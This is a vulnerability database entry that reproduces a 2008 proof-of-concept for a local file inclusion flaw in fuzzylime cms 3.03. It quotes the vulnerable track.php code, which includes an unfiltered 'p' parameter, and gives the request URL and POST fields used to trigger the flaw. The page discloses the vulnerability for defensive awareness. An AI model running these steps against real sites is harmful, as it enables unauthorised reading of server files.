Lucene search

K

fuzzylime cms 3.03 (track.php p) Local File Inclusion Vulnerability

๐Ÿ—“๏ธย 25 Nov 2008ย 00:00:00Reported byย Alfons LujaTypeย 
zdt
ย zdt
๐Ÿ”—ย 0day.today๐Ÿ‘ย 15ย Views

fuzzylime cms 3.03 (track.php p) Local File Inclusion Vulnerabilit

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
===================================================================
fuzzylime cms 3.03 (track.php p) Local File Inclusion Vulnerability
===================================================================



/*
--+_---=+--=_____=+++++

-- FuzzyLime 3.03 Local File Iclude PoC 
    ***
   (-0-)
  -____======_+++++---''''
***************************************__________________
-- Vuln 
 - code/track.php
   
  $m = $_GET[m];
  $p = $_GET[p]; //1 
  include "settings.inc.php";
  if(!isset($_POST[url]) || !isset($_POST[title]) || !isset($_POST[excerpt])) { //2
	header("Location: ${rooturl}index.php?s=news&p=$p&m=$m");
  }
  else {
    if(file_exists("../blogs/$p.inc.php")) { //3
	 include "../blogs/$p.inc.php";     //4 
   ...
1 $p is not filtered 
2 When POST'S is set 
3 and file exists
4 we have lfi

---+++++....--___________--============
*/


Go to LIVE_HTTP_HEADERS in firefox or opera or whatever
set url  http://site/path/code/track.php?p=[file] 
set "SEND POST CONNTENT"  url=evil&title=666&excerpt=xd
and push reply 
 
//Alfons Luja  25.12.2008




#  0day.today [2018-04-12]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
25 Nov 2008 00:00Current
7.1High risk
Vulners AI Score7.1
15
.json
Report